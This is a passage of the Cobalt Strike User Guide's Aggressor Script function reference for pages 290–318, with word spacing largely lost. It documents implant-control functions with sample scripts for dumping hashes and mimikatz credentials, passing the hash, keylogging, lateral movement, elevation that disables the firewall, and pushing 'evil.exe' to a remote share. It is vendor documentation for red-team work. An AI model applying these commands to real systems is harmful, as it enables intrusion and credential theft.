AggressorScript/Functions
|
||
#include "windows.h"
|
||
#include "stdio.h"
|
||
#include "tlhelp32.h"
|
||
#include "beacon.h"
|
||
void demo(char * args, int length) {
|
||
datap parser;
|
||
char * str_arg;
|
||
int num_arg;
|
||
BeaconDataParse(&parser, args, length);
|
||
str_arg = BeaconDataExtract(&parser, NULL);
|
||
num_arg = BeaconDataInt(&parser);
|
||
BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_
|
||
arg);
|
||
}
|
||
Example(hello.cna)
|
||
alias hello {
|
||
local('$barch $handle $data $args');
|
||
# figure out the arch of this session
|
||
$barch = barch($1);
|
||
# read in the right BOF file
|
||
$handle = openf(script_resource("hello. $+ $barch $+ .o"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
# pack our arguments
|
||
$args = bof_pack($1, "zi", "Hello World", 1234);
|
||
# announce what we're doing
|
||
btask($1, "Running Hello BOF");
|
||
# execute it.
|
||
beacon_inline_execute($1, $data, "demo", $args);
|
||
}
|
||
SeeAlso
|
||
&bof_pack
|
||
CobaltStrikeUserGuide www.fortra.com page:290
|
||
|
||
AggressorScript/Functions
|
||
beacon_link
|
||
ThisfunctionlinkstoanSMBorTCPlistener.IfthespecifiedlistenerisnotanSMBorTCP
|
||
listener,thisfunctiondoesnothing.
|
||
Arguments
|
||
$1-theidofthebeacontolinkthrough
|
||
$2-thetargethosttolinkto.Use$nullforlocalhost.
|
||
$3-thelistenertolink
|
||
Example
|
||
# smartlink [target] [listener name]
|
||
alias smartlink {
|
||
beacon_link($1, $2, $3);
|
||
}
|
||
beacon_remote_exec_method_describe
|
||
DescribeaBeaconremoteexecutemethod
|
||
Returns
|
||
AstringdescriptionoftheBeaconremoteexecutemethod.
|
||
Arguments
|
||
$1-themethod
|
||
Example
|
||
println(beacon_remote_exec_method_describe("wmi"));
|
||
Seealso
|
||
&beacon_remote_exec_method_register,&beacon_remote_exec_methods,&bremote_exec
|
||
CobaltStrikeUserGuide www.fortra.com page:291
|
||
|
||
AggressorScript/Functions
|
||
beacon_remote_exec_method_register
|
||
RegisteraBeaconremoteexecutemethodwithCobaltStrike.Thisaddsanoptionforusewith
|
||
theremote-execcommand.
|
||
Arguments
|
||
$1-themethodshortname
|
||
$2-adescriptionofthemethod
|
||
$3-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthetarget,$3isthe
|
||
command+args)
|
||
SeeAlso
|
||
&beacon_remote_exec_method_describe,&beacon_remote_exec_methods,&bremote_exec
|
||
beacon_remote_exec_methods
|
||
GetalistofremoteexecutemethodsregisteredwithCobaltStrike.
|
||
Returns
|
||
Anarrayofremoteexecmodules.
|
||
Example
|
||
printAll(beacon_remote_exec_methods());
|
||
Seealso
|
||
&beacon_remote_exec_method_describe,&beacon_remote_exec_method_register,&bremote_
|
||
exec
|
||
beacon_remote_exploit_arch
|
||
GetthearchinfoforthisBeaconlateralmovementoption.
|
||
CobaltStrikeUserGuide www.fortra.com page:292
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-theexploit
|
||
Returns
|
||
x86orx64
|
||
Example
|
||
println(beacon_remote_exploit_arch("psexec"));
|
||
SeeAlso
|
||
&beacon_remote_exploit_register,&beacon_remote_exploits,&bjump
|
||
beacon_remote_exploit_describe
|
||
DescribeaBeaconlateralmovementoption.
|
||
Returns
|
||
AstringdescriptionoftheBeaconlateralmovementoption.
|
||
Arguments
|
||
$1-theexploit
|
||
Example
|
||
println(beacon_remote_exploit_describe("psexec"));
|
||
SeeAlso
|
||
&beacon_remote_exploit_register,&beacon_remote_exploits,&bjump
|
||
beacon_remote_exploit_register
|
||
CobaltStrikeUserGuide www.fortra.com page:293
|
||
|
||
AggressorScript/Functions
|
||
RegisteraBeaconlateralmovementoptionwithCobaltStrike.Thisfunctionextendsthejump
|
||
command.
|
||
Arguments
|
||
$1-theexploitshortname
|
||
$2-thearchassociatedwiththisattack(e.g.,x86,x64)
|
||
$3-adescriptionoftheexploit
|
||
$4-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthetarget,$3isthe
|
||
listener)
|
||
Seealso
|
||
&beacon_remote_exploit_describe,&beacon_remote_exploits,&bjump
|
||
beacon_remote_exploits
|
||
GetalistoflateralmovementoptionsregisteredwithCobaltStrike.
|
||
Returns
|
||
Anarrayoflateralmovementoptionnames.
|
||
Example
|
||
printAll(beacon_remote_exploits());
|
||
Seealso
|
||
&beacon_remote_exploit_describe,&beacon_remote_exploit_register,&bjump
|
||
beacon_remove
|
||
RemoveaBeaconfromthedisplay.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:294
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacontoremove
|
||
beacon_stage_pipe
|
||
Thisfunctionhandlesthestagingprocessforabindpipestager.Thisisanoptionalstagerfor
|
||
lateralmovement.Youcanstageanyx86payload/listenerthroughthisstager.Use&stager_
|
||
bind_pipetogeneratethisstager.
|
||
Arguments
|
||
$1-theidofthebeacontostagethrough
|
||
$2-thetargethost
|
||
$3-thelistenername
|
||
$4-thearchitectureofthepayloadtostage.x86istheonlyoptionrightnow.
|
||
Example
|
||
# step 1. generate our stager
|
||
$stager = stager_bind_pipe("my listener");
|
||
# step 2. do something to run our stager
|
||
# step 3. stage a payload via this stager
|
||
beacon_stage_pipe($bid, $target, "my listener", "x86");
|
||
# step 4. assume control of the payload (if needed)
|
||
beacon_link($bid, $target, "my listener");
|
||
beacon_stage_tcp
|
||
ThisfunctionhandlesthestagingprocessforabindTCPstager.Thisisthepreferredstagerfor
|
||
localhost-onlystaging.Youcanstageanypayload/listenerthroughthisstager.Use&stager_
|
||
bind_tcptogeneratethisstager.
|
||
Arguments
|
||
$1-theidofthebeacontostagethrough
|
||
$2-reserved;use$nullfornow.
|
||
CobaltStrikeUserGuide www.fortra.com page:295
|
||
|
||
AggressorScript/Functions
|
||
$3-theporttostageto
|
||
$4-thelistenername
|
||
$5-thearchitectureofthepayloadtostage(x86,x64)
|
||
Example
|
||
# step 1. generate our stager
|
||
$stager = stager_bind_tcp("my listener", "x86", 1234);
|
||
# step 2. do something to run our stager
|
||
# step 3. stage a payload via this stager
|
||
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
|
||
# step 4. assume control of the payload (if needed)
|
||
beacon_link($bid, $target, "my listener");
|
||
beacons
|
||
GetinformationaboutallBeaconscallingbacktothisCobaltStriketeamserver.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachbeacon.
|
||
Example
|
||
foreach $beacon (beacons()) {
|
||
println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
|
||
}
|
||
belevate
|
||
AskBeacontospawnanelevatedsessionwitharegisteredtechnique.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theexploittofire
|
||
CobaltStrikeUserGuide www.fortra.com page:296
|
||
|
||
AggressorScript/Functions
|
||
$3-thelistenertotarget.
|
||
Example
|
||
item "&Elevate 31337" {
|
||
openPayloadHelper(lambda({
|
||
binput($bids, "elevate ms14-058 $1");
|
||
belevate($bids, "ms14-058", $1);
|
||
}, $bids => $1));
|
||
}
|
||
Seealso
|
||
&beacon_exploit_describe,&beacon_exploit_register,&beacon_exploits
|
||
belevate_command
|
||
AskBeacontorunacommandinahigh-integritycontext
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-themodule/commandelevatortouse
|
||
$3-thecommandanditsarguments.
|
||
Example
|
||
# disable the firewall
|
||
alias shieldsdn {
|
||
belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall
|
||
set allprofiles state off");
|
||
}
|
||
Seealso
|
||
&beacon_elevator_describe,&beacon_elevator_register,&beacon_elevators
|
||
berror
|
||
CobaltStrikeUserGuide www.fortra.com page:297
|
||
|
||
AggressorScript/Functions
|
||
PublishanerrormessagetotheBeacontranscript
|
||
Arguments
|
||
$1-theidforthebeacontopostto
|
||
$2-thetexttopost
|
||
Example
|
||
alias donotrun {
|
||
berror($1, "You should never run this command!");
|
||
}
|
||
bexecute
|
||
AskBeacontoexecuteacommand[withoutashell].Thisprovidesnooutputtotheuser.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandandargumentstorun
|
||
Example
|
||
bexecute($1, "notepad.exe");
|
||
bexecute_assembly
|
||
Spawnsalocal.NETexecutableassemblyasaBeaconpost-exploitationjob.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thelocalpathtothe.NETexecutableassembly
|
||
$3-parameterstopasstotheassembly
|
||
CobaltStrikeUserGuide www.fortra.com page:298
|
||
|
||
AggressorScript/Functions
|
||
$4-(optional)the"PATCHES:"argumentcanmodifyfunctionsinmemoryfortheprocess.Upto
|
||
4"patch-rule"rulescanbespecified(spacedelimited).
|
||
$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-
|
||
patch-value]
|
||
library -1-260characters
|
||
function -1-256characters
|
||
offset -0-65535(Theoffsetfromthestartoftheexecutablefunction)
|
||
hex-patch-value-2-200hexcharacters(0-9,A-F).Lengthmustbeevennumber(hex
|
||
pairs).
|
||
Notes
|
||
l Thiscommandacceptsavalid.NETexecutableandcallsitsentrypoint.
|
||
l Thispost-exploitationjobinheritsBeacon'sthreadtoken.
|
||
l Compileyourcustom .NETprogramswitha.NET3.5compilerforcompatibilitywith
|
||
systemsthatdon'thave.NET4.0andlater.
|
||
Example
|
||
alias myutil {
|
||
bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg
|
||
3\"");
|
||
}
|
||
bexit
|
||
AskaBeacontoexit.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
item "&Die" {
|
||
binput($1, "exit");
|
||
CobaltStrikeUserGuide www.fortra.com page:299
|
||
|
||
AggressorScript/Functions
|
||
bexit($1);
|
||
}
|
||
bgetprivs
|
||
AttemptstoenablethespecifiedprivilegeinyourBeaconsession.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-acomma-separatedlistofprivilegestoenable.See:
|
||
https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx
|
||
Example
|
||
alias debug {
|
||
bgetprivs($1, "SeDebugPriv");
|
||
}
|
||
bgetsystem
|
||
AskBeacontoattempttogettheSYSTEMtoken.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
item "Get &SYSTEM" {
|
||
binput($1, "getsystem");
|
||
bgetsystem($1);
|
||
}
|
||
bgetuid
|
||
AskBeacontoprinttheUserIDofthecurrenttoken
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:300
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
bgetuid($1);
|
||
bhashdump
|
||
AskBeacontodumplocalaccountpasswordhashes.Ifinjectingintoapidthatprocessrequires
|
||
administratorprivileges.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2 -thePIDtoinjectthehashdumpdllintoor$null.
|
||
$3 -(optional)thearchitectureofthetargetPID(x86|x64)or$null.
|
||
$4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap.
|
||
Example
|
||
Spawnatemporaryprocess
|
||
item "Dump &Hashes" {
|
||
binput($1, "hashdump");
|
||
bhashdump($1);
|
||
}
|
||
Injectintothespecifiedprocess)
|
||
bhashdump($1, 1234, "x64");
|
||
bind
|
||
BindakeyboardshortcuttoanAggressorScriptfunction.Thisisanalternatetothebind
|
||
keyword.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:301
|
||
|
||
AggressorScript/Functions
|
||
$1-thekeyboardshortcut
|
||
$2-acallbackfunction.Calledwhentheeventhappens.
|
||
Example
|
||
# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.
|
||
bind("Ctrl+Left", {
|
||
previousTab();
|
||
});
|
||
bind("Ctrl+Right", {
|
||
nextTab();
|
||
});
|
||
Seealso
|
||
&unbind
|
||
binfo
|
||
GetinformationfromaBeaconsession'smetadata.
|
||
Arguments
|
||
$1-theidforthebeacontopullmetadatafor
|
||
$2-thekeytoextract
|
||
Returns
|
||
Astringwiththerequestedinformation.
|
||
Example
|
||
println("User is: " . binfo("1234", "user"));
|
||
println("PID is: " . binfo("1234", "pid"));
|
||
binline_execute
|
||
CobaltStrikeUserGuide www.fortra.com page:302
|
||
|
||
AggressorScript/Functions
|
||
ExecuteaBeaconObjectFile.Thisisthesameasusingtheinline-executecommandinBeacon.
|
||
Arguments
|
||
$1-theidfortheBeacon
|
||
$2-thepathtotheBOFfile
|
||
$3-thestringargumenttopasstotheBOFfile
|
||
$4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Notes
|
||
Thisfunctionsfollowsthebehaviorof*inline-execute*intheBeaconconsole.Thestring
|
||
argumentwillbezero-terminated,convertedtothetargetencoding,andpassedasanargument
|
||
totheBOF'sgofunction.ToexecuteaBOF,withmorecontrol,use&beacon_inline_execute
|
||
TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on
|
||
page 171.
|
||
binput
|
||
ReportacommandwasruntotheBeaconconsoleandlogs.Scriptsthatexecutecommands
|
||
fortheuser(e.g.,events,popupmenus)shouldusethisfunctiontoassureoperatorattribution
|
||
ofautomatedactionsinBeacon'slogs.
|
||
Arguments
|
||
$1-theidforthebeacontopostto
|
||
$2-thetexttopost
|
||
Example
|
||
# indicate the user ran the ls command
|
||
binput($1, "ls");
|
||
bipconfig
|
||
TaskaBeacontolistnetworkinterfaces.
|
||
CobaltStrikeUserGuide www.fortra.com page:303
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-callbackfunctionwiththeipconfigresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Example
|
||
alias ipconfig {
|
||
bipconfig($1, {
|
||
blog($1, "Network information is:\n $+ $2");
|
||
});
|
||
}
|
||
bjobkill
|
||
AskBeacontokillarunningpost-exploitationjob
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thejobID.
|
||
Example
|
||
bjobkill($1, 0);
|
||
bjobs
|
||
AskBeacontolistrunningpost-exploitationjobs.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
bjobs($1);
|
||
CobaltStrikeUserGuide www.fortra.com page:304
|
||
|
||
AggressorScript/Functions
|
||
bjump
|
||
AskBeacontospawnasessiononaremotetarget.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetechniquetouse
|
||
$3-theremotetarget
|
||
$4-thelistenertospawn
|
||
Example
|
||
# winrm [target] [listener]
|
||
alias winrm {
|
||
bjump($1, "winrm", $2, $3);
|
||
}
|
||
Seealso
|
||
&beacon_remote_exploit_describe,&beacon_remote_exploit_register,&beacon_remote_exploits
|
||
bkerberos_ccache_use
|
||
AskbeacontoinjectaUNIXkerberosccachefileintotheuser'skerberostray
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thelocalpaththeccachefile
|
||
Example
|
||
alias kerberos_ccache_use {
|
||
bkerberos_ccache_use($1, $2);
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:305
|
||
|
||
AggressorScript/Functions
|
||
bkerberos_ticket_purge
|
||
Askbeacontopurgeticketsfromtheuser'skerberostray
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
alias kerberos_ticket_purge {
|
||
bkerberos_ticket_purge($1);
|
||
}
|
||
bkerberos_ticket_use
|
||
Askbeacontoinjectamimikatzkirbifileintotheuser'skerberostray
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thelocalpaththekirbifile
|
||
Example
|
||
alias kerberos_ticket_use {
|
||
bkerberos_ticket_use($1, $2);
|
||
}
|
||
bkeylogger
|
||
Injectsakeystrokeloggerintoaprocess.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-(optional)thePIDtoinjectthekeystrokeloggerintoor$null.
|
||
$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null.
|
||
CobaltStrikeUserGuide www.fortra.com page:306
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
Spawnatemporaryprocess
|
||
bkeylogger($1);
|
||
Injectintothespecifiedprocess
|
||
bkeylogger($1, 1234, "x64");
|
||
bkill
|
||
AskBeacontokillaprocess
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDtokill
|
||
Example
|
||
bkill($1, 1234);
|
||
blink
|
||
AskBeacontolinktoahostoveranamedpipe
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargettolinkto
|
||
$3-(optional)thepipenametouse.ThedefaultpipenameintheMalleableC2profileisthe
|
||
defaultotherwise.
|
||
Note
|
||
CobaltStrikeUserGuide www.fortra.com page:307
|
||
|
||
AggressorScript/Functions
|
||
Use&beacon_linkifyouwantascriptfunctionthatwillconnectorlinkbasedonalistener
|
||
configuration.
|
||
Example
|
||
blink($1, "DC");
|
||
blog
|
||
PublishesanoutputmessagetotheBeacontranscript.
|
||
Arguments
|
||
$1-theidforthebeacontopostto
|
||
$2-thetexttopost
|
||
Example
|
||
alias demo {
|
||
blog($1, "I am output for the blog function");
|
||
}
|
||
blog2
|
||
PublishesanoutputmessagetotheBeacontranscript.Thisfunctionhasanalternateformat
|
||
from&blog
|
||
Arguments
|
||
$1-theidforthebeacontopostto
|
||
$2-thetexttopost
|
||
Example
|
||
alias demo2 {
|
||
blog2($1, "I am output for the blog2 function");
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:308
|
||
|
||
AggressorScript/Functions
|
||
bloginuser
|
||
AskBeacontocreateatokenfromthespecifiedcredentials.Thisisthemake_tokencommand.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thedomainoftheuser
|
||
$3-theuser'susername
|
||
$4-theuser'spassword
|
||
Example
|
||
# make a token for a user with an empty password
|
||
alias make_token_empty {
|
||
local('$domain $user');
|
||
($domain, $user) = split("\\\\", $2);
|
||
bloginuser($1, $domain, $user, "");
|
||
}
|
||
blogonpasswords
|
||
AskBeacontodumpin-memorycredentialswithmimikatz.Thisfunctionrequiresadministrator
|
||
privileges.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2 -(optional)thePIDtoinjectthelogonpasswordscommandintoor$null
|
||
$3 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Example
|
||
Spawnatemporaryprocess
|
||
CobaltStrikeUserGuide www.fortra.com page:309
|
||
|
||
AggressorScript/Functions
|
||
item "Dump &Passwords" {
|
||
binput($1, "logonpasswords");
|
||
blogonpasswords($1);
|
||
}
|
||
Injectintothespecifiedprocess
|
||
beacon_command_register(
|
||
"logonpasswords_inject",
|
||
"Inject into a process and dump in-memory credentials with mimikatz",
|
||
"Usage: logonpasswords_inject [pid] [arch]");
|
||
alias logonpasswords_inject {
|
||
blogonpasswords($1, $2, $3);
|
||
}
|
||
bls
|
||
TaskaBeacontolistfiles
|
||
Variations
|
||
bls($1, "folder");
|
||
OutputtheresultstotheBeaconconsole.
|
||
bls($1, "folder", &callback);
|
||
Routeresultstothespecifiedcallbackfunction.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-(optional)thefoldertolistfilesfor.Use"."forthecurrentfolder.
|
||
$3-(optional)callbackfunctionwiththelsresults.Argumentstothecallbackare:$1=beacon
|
||
ID,$2=thefolder,$3=results
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:310
|
||
|
||
AggressorScript/Functions
|
||
on beacon_initial {
|
||
bls($1, ".");
|
||
}
|
||
bmimikatz
|
||
AskBeacontorunamimikatzcommand.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandandargumentstorun.Supportsthesemicolon( ;)charactertoseparate
|
||
multiplecommands
|
||
$3-(optional)thePIDtoinjectthemimikatzcommandintoor$null
|
||
$4-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Examples
|
||
# Usage: coffee [pid] [arch]
|
||
alias coffee {
|
||
if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
|
||
bmimikatz($1, "standard::coffee", $2, $3);
|
||
} else {
|
||
bmimikatz($1, "standard::coffee");
|
||
}
|
||
}
|
||
alias double_espresso {
|
||
bmimikatz($1, "standard::coffee;standard::coffee");
|
||
}
|
||
bmimikatz_small
|
||
UseCobaltStrike's"smaller"internalbuildofMimikatztoexecuteamimikatzcommand.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:311
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandandargumentstorun.Supportsthesemicolon( ;)charactertoseparate
|
||
multiplecommands
|
||
$3 -(optional)thePIDtoinjectthemimikatzcommandintoor$null
|
||
$4 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Note
|
||
Thismimikatzbuildsupports:
|
||
* kerberos::golden
|
||
* lsadump::dcsync
|
||
* sekurlsa::logonpasswords
|
||
* sekurlsa::pth
|
||
Alloftheotherstuffisremovedforsize.Use&bmimikatzifyouwanttobringthefullpowerof
|
||
mimikatztosomeotheroffenseproblem.
|
||
Example
|
||
# Usage: logonpasswords_elevate [pid] [arch]
|
||
alias logonpasswords_elevate {
|
||
if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
|
||
bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
|
||
} else {
|
||
bmimikatz_small($1, "!sekurlsa::logonpasswords");
|
||
}
|
||
}
|
||
bmkdir
|
||
AskBeacontomakeadirectory
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
CobaltStrikeUserGuide www.fortra.com page:312
|
||
|
||
AggressorScript/Functions
|
||
$2-thefoldertocreate
|
||
Example
|
||
bmkdir($1, "you are owned");
|
||
bmode
|
||
ChangethedatachannelforaDNSBeacon.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thedatachannel(e.g.,dns,dns6,ordns-txt)
|
||
Example
|
||
item "Mode DNS-TXT" {
|
||
binput($1, "mode dns-txt");
|
||
bmode($1, "dns-txt");
|
||
}
|
||
bmv
|
||
AskBeacontomoveafileorfolder.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefileorfoldertomove
|
||
$3-thedestination
|
||
Example
|
||
bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");
|
||
bnet
|
||
CobaltStrikeUserGuide www.fortra.com page:313
|
||
|
||
AggressorScript/Functions
|
||
RunacommandfromBeacon'snetworkandhostenumerationtool.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandtorun.
|
||
Type Description
|
||
computers listshostsinadomain(groups)
|
||
dclist listsdomaincontrollers
|
||
domain showthecurrentdomain
|
||
domain_controllers listdomaincontrollerhostsinadomain(groups)
|
||
domain_trusts listsdomaintrusts
|
||
group listsgroupsandusersingroups
|
||
localgroup listslocalgroupsandusersinlocalgroups
|
||
logons listsusersloggedontoahost
|
||
sessions listssessionsonahost
|
||
share listssharesonahost
|
||
user listsusersanduserinformation
|
||
time showtimeforahost
|
||
view listshostsinadomain(browserservice)
|
||
$3-thetargettorunthiscommandagainstor$null
|
||
$4-theparametertothiscommand(e.g.,agroupname)
|
||
$5-(optional)thePIDtoinjectthenetworkandhostenumerationtoolintoor$null
|
||
$6-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
$7-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
NOTE:
|
||
ThedomaincommandexecutesaBOFusinginline_executeandwillnotspawnorinject
|
||
intoaprocess
|
||
CobaltStrikeUserGuide www.fortra.com page:314
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
Spawnatemporaryprocess
|
||
# ladmins [target]
|
||
# find the local admins for a target
|
||
alias ladmins {
|
||
bnet($1, "localgroup", $2, "administrators");
|
||
}
|
||
Injectintothespecifiedprocess
|
||
# ladmins [pid] [arch] [target]
|
||
# find the local admins for a target
|
||
alias ladmins {
|
||
bnet($1, "localgroup", $4, "administrators", $2, $3);
|
||
}
|
||
bnote
|
||
AssignanotetothespecifiedBeacon.
|
||
Arguments
|
||
$1-theidforthebeacontopostto
|
||
$2-thenotecontent
|
||
Example
|
||
bnote($1, "foo");
|
||
bof_extract
|
||
Thisfunctionextractstheexecutablecodefromthebeaconobjectfile.
|
||
Arguments
|
||
$1-Astringcontainingthebeaconobjectfile
|
||
CobaltStrikeUserGuide www.fortra.com page:315
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
$handle = openf(script_resource("/object_file"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
return bof_extract($data);
|
||
bof_pack
|
||
Packargumentsinawaythat'ssuitableforBOFAPIstounpack.
|
||
Arguments
|
||
$1-theidfortheBeacon(neededforunicodeconversions)
|
||
$2-formatstringforthepackeddata
|
||
...-oneargumentperiteminourformatstring
|
||
Note
|
||
Thisfunctionpacksitsargumentsintoabinarystructureforusewith&beacon_inline_execute.
|
||
TheformatstringoptionsherecorrespondtotheBeaconData*CAPIavailabletoBOFfiles.This
|
||
APIhandlestransformationsonthedataandhintsasrequiredbyeachtypeitcanpack.
|
||
Type Description Unpack With (C)
|
||
b binarydata BeaconDataExtract
|
||
i 4-byteinteger BeaconDataInt
|
||
s 2-byteshortinteger BeaconDataShort
|
||
z zero-terminated+encodedstring BeaconDataExtract
|
||
Z zero-terminatedwide-charstring (wchar_t*)BeaconDataExtract
|
||
TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on
|
||
page 171.
|
||
Seealso
|
||
&beacon_inline_execute
|
||
CobaltStrikeUserGuide www.fortra.com page:316
|
||
|
||
AggressorScript/Functions
|
||
bpassthehash
|
||
AskBeacontocreateatokenthatpassesthespecifiedhash.Thisisthepthcommandin
|
||
Beacon.Itusesmimikatz.Thisfunctionrequiresadministratorprivileges.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thedomainoftheuser
|
||
$3-theuser'susername
|
||
$4-theuser'spasswordhash
|
||
$5 -(optional)thePIDtoinjectthepthcommandintoor$null
|
||
$6 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Example
|
||
Spawnatemporaryprocess
|
||
bpassthehash($1, "CORP", "Administrator", "password_hash");
|
||
Injectintothespecifiedprocess
|
||
bpassthehash($1, "CORP", "Administrator", "password_hash", 1234, "x64");
|
||
bpause
|
||
AskBeacontopauseitsexecution.Thisisaone-offsleep.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-howlongtheBeaconshouldpauseexecutionfor(milliseconds)
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:317
|
||
|
||
AggressorScript/Functions
|
||
alias pause {
|
||
bpause($1, int($2));
|
||
}
|
||
bportscan
|
||
AskBeacontorunitsportscanner.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargetstoscan(e.g.,192.168.12.0/24)
|
||
$3-theportstoscan(e.g.,1-1024,6667)
|
||
$4-thediscoverymethodtouse(arp|icmp|none)
|
||
$5-themaxnumberofsocketstouse(e.g.,1024)
|
||
$6 -(optional)thePIDtoinjecttheportscannerintoor$null
|
||
$7 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
$8-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Example
|
||
Spawnatemporaryprocess
|
||
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);
|
||
Injectintothespecifiedprocess
|
||
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");
|
||
bpowerpick
|
||
Spawnaprocess,injectUnmanagedPowerShell,andrunthespecifiedcommand.
|
||
CobaltStrikeUserGuide www.fortra.com page:318
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecmdletandarguments
|
||
$3-(optional)ifspecified,powershell-importscriptisignoredandthisargumentistreatedas
|
||
thedownloadcradletoprependtothecommand.EmptystringisOKheretoo,fornodownload
|
||
cradle.Specify$nulltousethecurrentimportedPowerShellscript.
|
||
$4-(optional)the"PATCHES:"argumentcanmodifyfunctionsinmemoryfortheprocess.Upto
|
||
